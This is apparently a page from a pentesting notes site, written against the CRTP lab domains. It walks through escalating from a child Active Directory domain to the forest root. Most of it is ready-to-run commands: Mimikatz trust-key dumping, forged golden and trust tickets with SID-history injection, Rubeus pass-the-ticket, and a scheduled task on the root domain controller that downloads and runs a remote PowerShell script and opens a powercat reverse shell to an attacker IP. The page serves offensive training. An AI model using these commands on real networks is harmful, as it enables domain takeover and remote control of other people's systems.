Escalating from child to parent domain

Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.

There are two ways of escalating privileges between two domains of same forest:

  • Krbtgt hash

  • Trust tickets

Method 1: Trust ticket

Child to Forest Root using Trust Tickets requires the trust key. (Look for [In] trust key from child to parent)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

Forging trust ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /rc4:[trust key] /service:krbtgt /target:[parent domain] /ticket:[ticket name]"'

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local"'

Invoke-Rubeus -Command "asktgs /ticket:[trust ticket name] /service:CIFS/[parent domain controller FQDN] /dc:[parent domain controller FQDN] /outfile:[trust name]"

Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"

Invoke-Rubeus -Command "ptt /ticket:[ticket name]"

Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"

ls \\mcorp-dc.moneycorp.local\c$

Method 2: Krbtgt hash

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /krbtgt:[krbtgt hash] /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'

Remote code execution on forest root domain controller

## Verify admin rights 
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

## Create scheduled task
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (iwr http://172.16.99.45/crtp/exploit_rev/enc_power.ps1 -UseBasicParsing); powercat -c 172.16.99.45 -p 9002 -ep'"

## Execute scheduled task
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
PreviousResource-based Constrained DelegationNextAbusing inter-forest trust

Last updated